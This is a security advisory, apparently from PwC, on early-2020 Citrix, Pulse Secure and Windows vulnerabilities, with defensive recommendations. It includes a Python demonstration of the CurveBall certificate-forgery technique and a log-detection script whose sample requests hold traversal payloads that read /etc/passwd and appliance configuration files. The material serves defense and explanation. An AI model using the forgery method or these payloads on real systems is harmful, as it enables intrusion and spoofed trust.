The first 2020 challenges for cyber professionals: three new vulnerabilities and rising nation-state threats


Just a few days into 2020, CISOs were already facing an uncommon test of resilience. The makers of three widely used technology products, Citrix, Pulse Secure and Microsoft, disclosed critical vulnerabilities, several of them exploitable remotely without authentication, in products that together run on close to a billion devices. 

Responding quickly and effectively to these threats is urgent for protecting critical business services and infrastructures. Now is also the time to strengthen your defenses and test your digital and operational resilience for what promises to be the most challenging decade yet for cybersecurity. 


Three new vulnerabilities to address ASAP

Citrix, Pulse Secure and Microsoft have all disclosed vulnerabilities that could allow attackers remote access to users’ systems, networks and data. Hackers treat announced vulnerabilities as open invitations to exploit susceptible systems, sometimes within hours of first notification. Anyone using these products should address these vulnerabilities immediately.

Citrix Application Delivery Controller and Citrix Gateway

CVE-2019-19781

Citrix provides one of the most popular remote access technologies in use today. Many organizations use Citrix ADC and Citrix Gateway to provide access to remote employees and contractors. Enterprises using these products should take immediate action.

According to Citrix, a vulnerability in Citrix Application Delivery Controller (ADC), formerly known as NetScaler ADC, and Citrix Gateway, formerly known as NetScaler Gateway, could, if exploited, allow an unauthenticated attacker to perform arbitrary code execution. Several proof-of-concept exploits have been published online, and exploitation of exposed appliances has been observed in the wild.

Citrix strongly urges affected customers to apply the published mitigation immediately: a responder policy that rejects requests containing a directory traversal (/../) into the /vpns/ path. Patched firmware is forthcoming; the mitigation is an interim measure, so confirm it is actually active and follow up with the patch once it is released. Appliances that were reachable from the internet before the mitigation was applied should be checked for signs of compromise, since exploitation may already have taken place.


Pulse Secure

CVE-2019-11510

Pulse Secure VPN is one of the most widely used tools allowing employees to securely access their corporate networks. The vulnerability, disclosed and patched by Pulse Secure in April 2019 but still present on many internet-facing servers, allows an unauthenticated attacker to read arbitrary files from a vulnerable Pulse Connect Secure server, including files that hold cached credentials and session information. Organizations should upgrade Pulse Connect Secure and Pulse Policy Secure server software to the latest versions, which address the vulnerability. Because exploitation can expose credentials, a server that was reachable while vulnerable should be treated as potentially compromised: patch it, then reset the credentials and sessions it held rather than assuming the upgrade alone restores a trustworthy state. 


Microsoft Windows

CVE-2020-0601

Windows 10, Windows Server 2016, 2019

Nearly 1 billion devices worldwide are said to run Windows 10 or Windows Server operating systems, and all of these could be exposed, putting their systems and information at risk. Microsoft and the US National Security Agency, which discovered and reported the flaw, announced on 14 January a vulnerability in the Windows CryptoAPI (crypt32.dll) affecting Windows 10 and Windows Server 2016 and 2019, recommending that all devices running these products be patched as soon as possible.

According to Microsoft, “an attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.” Additionally, “a successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.”

Microsoft's security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates, including the curve parameters they carry, rather than matching a certificate against a trusted root on its public key alone.
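The following is an added example, not Microsoft's code or the page's own, that models the flaw behind CVE-2020-0601 as it has been publicly described: a certificate that carries explicit (rather than named) elliptic-curve parameters can choose its own generator point, and a verifier that matches a trusted root on the public key alone, without checking those parameters, will accept it. The "trusted root" key, the attacker's private key and the ECDSA nonce are constructed constants; the curve is the real NIST P-256. The attacker never needs the root's private key: given only the root's public point Q, it picks any private key d' and sets the generator to G' = d'^-1 * Q, so that d' * G' = Q. The example then shows that a signature made with d' verifies under the forged parameters, that the pre-patch key-only check trusts it, and that the fixed check (key and full domain parameters) rejects it.

```python
import hashlib

# NIST P-256 domain parameters (standard values).
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
NAMED_P256 = (P, A, B, G, N)   # what a certificate carrying the named-curve OID means

def inv(x, m):
    return pow(x, -1, m)       # modular inverse (Python 3.8+)

def on_curve(pt):
    x, y = pt
    return (y * y - x * x * x - A * x - B) % P == 0

def add(p1, p2):
    """Affine point addition on y^2 = x^3 + A x + B over GF(P); None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None
        lam = (3 * x1 * x1 + A) * inv(2 * y1, P) % P
    else:
        lam = (y2 - y1) * inv(x2 - x1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)

def mul(k, pt):
    """Double-and-add scalar multiplication."""
    result = None
    while k:
        if k & 1:
            result = add(result, pt)
        pt = add(pt, pt)
        k >>= 1
    return result

# Constructed "trusted root" (stand-in for a CA key in the Windows root store).
# The attacker only ever uses ROOT_PUB; ROOT_PRIV exists here just to create it.
ROOT_PRIV = 0x0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
ROOT_PUB = mul(ROOT_PRIV, G)
TRUSTED_ROOTS = [{"params": NAMED_P256, "pub": ROOT_PUB}]

def forge_params(target_pub, fake_priv):
    """Explicit curve parameters whose generator G' = fake_priv^-1 * Q, so that fake_priv * G' == Q."""
    g_prime = mul(inv(fake_priv, N), target_pub)
    return (P, A, B, g_prime, N)

def hash_to_int(msg, n):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % n

def ecdsa_sign(params, priv, msg, k):
    _, _, _, g, n = params
    r = mul(k, g)[0] % n
    s = inv(k, n) * (hash_to_int(msg, n) + r * priv) % n
    return (r, s)

def ecdsa_verify(params, pub, msg, sig):
    _, _, _, g, n = params
    r, s = sig
    if not (0 < r < n and 0 < s < n):
        return False
    w = inv(s, n)
    z = hash_to_int(msg, n)
    x = add(mul(z * w % n, g), mul(r * w % n, pub))
    return x is not None and x[0] % n == r

def trusted_vulnerable(params, pub):
    """Pre-patch behaviour: the root is matched on its public key alone; curve parameters are ignored."""
    return any(root["pub"] == pub for root in TRUSTED_ROOTS)

def trusted_fixed(params, pub):
    """Post-patch behaviour: the public key AND the full domain parameters must match the stored root."""
    return any(root["pub"] == pub and root["params"] == params for root in TRUSTED_ROOTS)

def demo(fake_priv=0x1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef,
         k=0xa5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5):
    """Attacker-chosen private key and a constructed fixed nonce; returns what each check concludes."""
    params = forge_params(ROOT_PUB, fake_priv)
    msg = b"contents of a malicious executable (constructed)"
    sig = ecdsa_sign(params, fake_priv, msg, k)
    return {
        "forged_generator_reproduces_root_key": mul(fake_priv, params[3]) == ROOT_PUB,
        "signature_verifies_under_forged_params": ecdsa_verify(params, ROOT_PUB, msg, sig),
        "signature_verifies_under_real_P256": ecdsa_verify(NAMED_P256, ROOT_PUB, msg, sig),
        "vulnerable_check_trusts": trusted_vulnerable(params, ROOT_PUB),
        "fixed_check_trusts": trusted_fixed(params, ROOT_PUB),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The point for defenders is the last two lines of the result: the same forged certificate is "trusted" by a verifier that compares only the key and rejected by one that also compares the curve parameters, which is exactly the difference the January update makes. A toolchain that pins trust on a key hash alone, wherever it runs, has the same weakness.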

 

CVE-2020-0609/CVE-2020-0610

Microsoft Windows Remote Desktop Gateway

According to Microsoft, “A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction.”

  • Affects all supported Windows Server versions (Server 2012 and newer; support for Server 2008 ends January 14, 2020);
  • Occurs pre-authentication; and
  • Requires no user interaction to perform.

Microsoft's updates for CVE-2020-0609 and CVE-2020-0610 correct how RD Gateway handles connection requests. Both flaws lie in the gateway's UDP transport, so where the patch cannot be applied immediately a widely recommended interim workaround is to disable UDP transport on the RD Gateway or block UDP port 3391 at the perimeter; this degrades RDP session performance and is a stop-gap, not a substitute for the patch.

 

CVE-2020-0611

Windows Remote Desktop Client

According to Microsoft, “A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client.”

Exploiting CVE-2020-0611 requires the attacker to control a server and then induce a user to connect to it, whether via social engineering, DNS poisoning, a man-in-the-middle attack or by compromising a legitimate server.

This security update addresses the vulnerability by correcting how the Windows Remote Desktop Client handles connection requests.


Guard against exploitation of these vulnerabilities amid fresh geopolitical tensions

Rising geopolitical tensions and the 2020 US elections could affect the exploitation of these vulnerabilities. Earlier in January, we published guidance following an alert from US-CERT on the potential for a cyber response to recent geopolitical events. Organizations concerned about being affected by this should understand the actors likely to be involved and the company’s potential vulnerability to the types of attacks these actors are likely to carry out. They should then rapidly mobilize targeted activities to shore up relevant security capabilities.

What you should do to address these vulnerabilities

Short-term actions

  1. Re-engage with your executive business leadership.
    Provide this key message: Threats are coming more quickly than ever. We're monitoring the situation and have a plan to address it.
  2. Understand and re-assess your organization's unique threat profile.
    • Are you more likely to be targeted by nation-state actors because you are part of US critical infrastructure or somehow connected to national interests?
    • Which of the vulnerable technologies described above do you use?
    • Do you have other known vulnerabilities that you haven’t addressed?
  3. Adopt a state of heightened awareness.
    Minimize coverage gaps in your personnel availability, consume relevant threat intelligence such as Cybersecurity and Infrastructure Security Agency (CISA) alerts promptly and consistently and update your emergency call trees.
  4. Increase organizational vigilance. Ensure information security personnel are monitoring key internal security capabilities and that they know how to identify anomalous behavior. Flag any known Iranian indicators of compromise and tactics, techniques and procedures for immediate response.
  5. Organize a “swat team.” The team’s mission is to deploy the patches and interim mitigations and to update detection tooling to cover the techniques the attackers are using, for example by writing custom detection use cases and rules based on the advisories listed above.
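As an added example of the kind of detection rule the swat team would write, and not code from PwC or any of the vendors above, the script below scans web-server access logs for the request patterns used against the Citrix ADC/Gateway flaw (CVE-2019-19781: a directory traversal from /vpn/ into the /vpns/ back-end scripts) and the Pulse Connect Secure flaw (CVE-2019-11510: a traversal through the HTML5 guacamole handler to read arbitrary files). The log lines are constructed for the example and use documentation IP ranges; the log format assumed is the common Combined Log Format, so the regular expression would need adjusting for a proxy or appliance that logs differently.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed Combined-Log-Format lines (not real traffic). The request paths
# reproduce the publicly documented traversal patterns for the two CVEs;
# the IPs are documentation ranges (RFC 5737).
SAMPLE_LOG = """\
203.0.113.7 - - [11/Jan/2020:03:14:07 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 312 "-" "curl/7.58.0"
203.0.113.7 - - [11/Jan/2020:03:14:09 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 0 "-" "python-requests/2.22"
198.51.100.23 - - [11/Jan/2020:04:02:51 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1862 "-" "Mozilla/5.0"
192.0.2.10 - - [11/Jan/2020:04:05:00 +0000] "GET /vpn/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.11 - - [11/Jan/2020:04:06:13 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
203.0.113.8 - - [11/Jan/2020:04:07:44 +0000] "GET /vpn/%2e%2e/vpns/cfg/smb.conf HTTP/1.1" 200 312 "-" "curl/7.58.0"
"""

# Combined Log Format: ip ident user [timestamp] "METHOD target PROTO" status ...
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def normalize(target: str) -> str:
    """Percent-decode until stable so %2e%2e and double-encoded traversals are not missed."""
    for _ in range(3):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target.lower()

def classify(target: str) -> List[str]:
    """Return the CVE identifiers whose documented request pattern the target matches."""
    t = normalize(target)
    hits = []
    # Citrix ADC/Gateway: traversal out of /vpn/ into the /vpns/ back-end scripts.
    if "/vpns/" in t and "/../" in t:
        hits.append("CVE-2019-19781")
    # Pulse Connect Secure: traversal through the HTML5 guacamole handler.
    if "/../" in t and "/dana/html5acc/guacamole/" in t:
        hits.append("CVE-2019-11510")
    return hits

def scan_log(text: str) -> List[Dict[str, str]]:
    """One finding per (line, CVE) pair; lines that do not parse as CLF are skipped."""
    findings = []
    for line in text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        for cve in classify(m["target"]):
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "cve": cve, "status": m["status"],
                "request": f'{m["method"]} {m["target"]}',
            })
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f'{f["ts"]} {f["ip"]} {f["cve"]} {f["status"]} {f["request"]}')
```

Two details matter in practice. First, match on the decoded path: the Citrix responder-policy mitigation itself decodes the URL before testing it, and the last sample line shows why. Second, keep the HTTP status in the finding: a 200 on one of these requests means the traversal reached the back end and the host should be treated as compromised, whereas a 403 on an appliance with the mitigation in place means the attempt was blocked and is only an indicator of targeting.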

Longer-term considerations

  1. Know your assets, interdependencies and critical functions. Step one in building resilience against operational and IT disruptions is to have real-time visibility into your assets, interdependencies and critical functions. Position your organization to catch potential disruptions before they happen.
  2. Implement defense in depth, with an emphasis on shoring up these capabilities:
    • Prevent malicious files from being delivered via phishing emails by restricting the file types permitted by email and web filtering tools
    • Restrict what can be executed on workstations, including scripts (e.g., PowerShell, HTA and CHM files) and untrusted macros in Microsoft Office files
    • Prevent the abuse of compromised credentials by deploying multi-factor authentication on all externally accessible services, critical internal services and services used by managed service providers to access internal systems
    • Protect domain admin accounts by onboarding them onto privileged access management solutions and limiting their use
    • Limit the ability of attackers to gain administrative access to systems by restricting membership of local admin groups and setting unique random passwords on default local admin accounts
    • Protect (typically highly privileged) service accounts by ensuring these have strong passwords and are prevented from logging in interactively
    • Limit attackers’ ability to access sensitive data by restricting access to open network shares and other potentially sensitive data stores (e.g., intranet, internal wikis and file servers)
    • Improve detection of and response to attacker activity by deploying additional security tools such as endpoint detection and response technology and anti-virus products with support for the Windows Anti-Malware Scan Interface
  3. Continue to enhance patch and vulnerability management processes.
    Make sure you are having discussions with leadership and with partners and suppliers. The case of vulnerabilities in medical devices, for example, points to the shortsightedness of dealing with vulnerability management as an IT problem alone.
  4. Engage in industry collaboration and information sharing.
  5. Be ready with response and recovery plans. Use these new 2020 challenges as an occasion to double down on building resilience into your organization.

This is a time to shore up cyber practices in your organization and aim to apply leading practices which PwC has been studying, advising on and fostering. Our Digital Trust Insights 2019 series is a survey-based study of the practices of companies that are business-driven in their cybersecurity strategy, that plan for resilience by design and weave data privacy into the fabric of the organization.

Contact us

Sean Joyce

Global and US Cybersecurity, Privacy & Forensics Leader, PwC US

Joseph Nocera

Cyber & Privacy Innovation Institute Leader, PwC US

Gerasimos J. Stellatos

Principal, Cybersecurity and Privacy, PwC US

Chris Morris

Principal, Cybersecurity and Privacy, PwC US
